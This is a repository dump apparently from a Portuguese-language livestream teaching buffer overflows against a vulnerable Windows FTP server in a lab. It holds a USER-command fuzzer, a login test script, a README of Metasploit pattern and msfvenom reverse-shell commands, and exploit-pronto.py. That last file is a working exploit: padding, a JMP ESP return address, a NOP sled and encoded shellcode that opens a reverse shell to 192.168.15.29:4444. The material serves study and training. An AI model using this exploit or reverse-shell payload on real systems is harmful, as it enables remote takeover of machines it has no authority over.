├── ward165.exe
├── Buffer Overflow.pptx
├── exploit.py
├── ftp-fuzz.py
├── README.md
└── exploit-pronto.py

/ward165.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/helviojunior/live_bufferoverflow/HEAD/ward165.exe
--------------------------------------------------------------------------------

/Buffer Overflow.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/helviojunior/live_bufferoverflow/HEAD/Buffer Overflow.pptx
--------------------------------------------------------------------------------

/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Walks through one FTP login exchange against the lab host (USER, then a second
# USER) with a plain 12-byte username; this script sends no overflow payload.
# Python 2 syntax (print statements, str payloads): it does not run unmodified under Python 3.

import socket
# NOTE(review): sys.exit() is used below but sys is never imported, so a failed
# connect ends in a NameError instead of the intended clean exit.

remoteip="192.168.15.150"  # lab target, hard-coded

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((remoteip, 21))
except:  # bare except also swallows KeyboardInterrupt; socket.error is the narrower choice
    print ("[-] Connection error!")
    sys.exit(1)

buffer="LiveOverflow"


print s.recv(1024)  # first server reply after connect
print "Mandando a maldade..."
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
print "Sending pass..."
# NOTE(review): the message above says "pass", but the command sent is USER again, not PASS.
s.send('USER LiveOverflow\r\n')
print s.recv(1024)
s.close()

--------------------------------------------------------------------------------

/ftp-fuzz.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Reconnects in an endless loop and sends a USER argument that grows by 100 bytes
# per iteration, starting from an empty string. The loop has no break: it runs
# until interrupted or until a connect fails (sys.exit below).
# Python 2 syntax (print statements, str payloads): it does not run unmodified under Python 3.

import socket, time
# NOTE(review): sys.exit() is used below but sys is never imported, so a failed
# connect ends in a NameError instead of the intended clean exit.

remoteip="192.168.15.150"  # lab target, hard-coded

size=0  # first iteration sends an empty USER argument
while True:

    string = "A"*size

    print "Fuzzing PASS with %s bytes" % len(string)  # NOTE(review): the string goes into USER, not PASS
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # NOTE(review): no timeout is set on the socket, so a recv() below blocks
    # indefinitely once the server stops replying, and the loop never advances.
    try:
        s.connect((remoteip, 21))
    except:  # bare except also swallows KeyboardInterrupt; socket.error is the narrower choice
        print ("[-] Connection error!")
        sys.exit(1)

    print s.recv(1024)  # first server reply after connect
    print "Sending username..."
    s.send('USER ' + string + '\r\n')
    print s.recv(1024)
    print "Sending pass..."
    # NOTE(review): the message above says "pass", but the command sent is USER again, not PASS.
    s.send('USER LiveOverflow\r\n')
    print s.recv(1024)
    s.close()

    time.sleep(1)  # one-second pause between connections

    size += 100
    print ""

--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Live - Buffer Overflow, uma introdução ao assunto

## Link do Youtube

Para quem perdeu a Live, segue o link do vídeo gravado do YouTube
```
https://youtu.be/oGZ01rvbfwE
```

## Tabela ASCII
```
Char Dec Oct Hex Linux
(nl) 10 0012 x0a \n
(cr) 13 0015 x0d \r
A 65 0101 x41
B 66 0102 x42
C 67 0103 x43
```

## Comandos utilizados

**Gerando texto único para identificação da posição do EIP**
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
```

**Checando a posição (offset) do EIP**
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
```

**Conectando no rdesktop**
```
rdesktop -u usuario -p senha -g 65% -x m endereco
```

**Buscando informações do serviço**
```
nmap -Pn -p21 -A 192.168.15.150
```

**Gerando payload do shell reverso**
```
msfvenom -p windows/shell_reverse_tcp LHOST=IP_atacante LPORT=Porta_atacante -b "\x00\x0a\x0d\x40" -a x86 -f python
```
--------------------------------------------------------------------------------

/exploit-pronto.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Sends the buffer built below as the USER argument: 485 bytes of padding, a
# 4-byte address, 16 NOP bytes, then the msfvenom-generated bytes.
# Python 2 syntax (print statements, str payloads): it does not run unmodified under Python 3.

import socket
# NOTE(review): sys.exit() is used below but sys is never imported, so a failed
# connect ends in a NameError instead of the intended clean exit.

remoteip="192.168.15.150"  # lab target, hard-coded

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((remoteip, 21))
except:  # bare except also swallows KeyboardInterrupt; socket.error is the narrower choice
    print ("[-] Connection error!")
    sys.exit(1)

# Generated with: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.15.29 LPORT=4444 -b "\x00\x0a\x0d\x40" -a x86 -f python
# The lines below are the encoder's output copied verbatim; they are not human-readable.
# Defender's note: this payload travels in clear text inside the FTP USER command on
# port 21, so it is fully visible to any packet capture or IDS watching that service.
buf = ""
buf += "\xb8\xf6\xa1\x6d\xa9\xda\xc1\xd9\x74\x24\xf4\x5b\x31"
buf += "\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb5\xaf\x8f"
buf += "\x5c\xc5\x58\xcd\x9f\x35\x99\xb2\x16\xd0\xa8\xf2\x4d"
buf += "\x91\x9b\xc2\x06\xf7\x17\xa8\x4b\xe3\xac\xdc\x43\x04"
buf += "\x04\x6a\xb2\x2b\x95\xc7\x86\x2a\x15\x1a\xdb\x8c\x24"
buf += "\xd5\x2e\xcd\x61\x08\xc2\x9f\x3a\x46\x71\x0f\x4e\x12"
buf += "\x4a\xa4\x1c\xb2\xca\x59\xd4\xb5\xfb\xcc\x6e\xec\xdb"
buf += "\xef\xa3\x84\x55\xf7\xa0\xa1\x2c\x8c\x13\x5d\xaf\x44"
buf += "\x6a\x9e\x1c\xa9\x42\x6d\x5c\xee\x65\x8e\x2b\x06\x96"
buf += "\x33\x2c\xdd\xe4\xef\xb9\xc5\x4f\x7b\x19\x21\x71\xa8"
buf += "\xfc\xa2\x7d\x05\x8a\xec\x61\x98\x5f\x87\x9e\x11\x5e"
buf += "\x47\x17\x61\x45\x43\x73\x31\xe4\xd2\xd9\x94\x19\x04"
buf += "\x82\x49\xbc\x4f\x2f\x9d\xcd\x12\x38\x52\xfc\xac\xb8"
buf += "\xfc\x77\xdf\x8a\xa3\x23\x77\xa7\x2c\xea\x80\xc8\x06"
buf += "\x4a\x1e\x37\xa9\xab\x37\xfc\xfd\xfb\x2f\xd5\x7d\x90"
buf += "\xaf\xda\xab\x37\xff\x74\x04\xf8\xaf\x34\xf4\x90\xa5"
buf += "\xba\x2b\x80\xc6\x10\x44\x2b\x3d\xf3\xab\x04\x32\x1e"
buf += "\x44\x57\x4c\x31\xc8\xde\xaa\x5b\xe0\xb6\x65\xf4\x99"
buf += "\x92\xfd\x65\x65\x09\x78\xa5\xed\xbe\x7d\x68\x06\xca"
buf += "\x6d\x1d\xe6\x81\xcf\x88\xf9\x3f\x67\x56\x6b\xa4\x77"
buf += "\x11\x90\x73\x20\x76\x66\x8a\xa4\x6a\xd1\x24\xda\x76"
buf += "\x87\x0f\x5e\xad\x74\x91\x5f\x20\xc0\xb5\x4f\xfc\xc9"
buf += "\xf1\x3b\x50\x9c\xaf\x95\x16\x76\x1e\x4f\xc1\x25\xc8"
buf += "\x07\x94\x05\xcb\x51\x99\x43\xbd\xbd\x28\x3a\xf8\xc2"
buf += "\x85\xaa\x0c\xbb\xfb\x4a\xf2\x16\xb8\x7b\xb9\x3a\xe9"
buf += "\x13\x64\xaf\xab\x79\x97\x1a\xef\x87\x14\xae\x90\x73"
buf += "\x04\xdb\x95\x38\x82\x30\xe4\x51\x67\x36\x5b\x51\xa2"


buffer="A" * 485  # padding before the 4-byte address (offset presumably from the pattern_offset step in the README)
#77F5801C FFE4 JMP ESP ==> ntdll.dll
# NOTE(review): hard-coded address from one specific ntdll.dll build; the PoC is
# tied to the lab image it was written against and will not hold elsewhere.
buffer += "\x1c\x80\xf5\x77"  # the address above, written little-endian
buffer += "\x90"*16  # 16 x86 NOP (0x90) bytes
buffer += buf

print s.recv(1024)  # first server reply after connect
print "Mandando a maldade..."
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
print "Sending pass..."
# NOTE(review): the message above says "pass", but the command sent is USER again, not PASS.
s.send('USER LiveOverflow\r\n')
print s.recv(1024)
s.close()

--------------------------------------------------------------------------------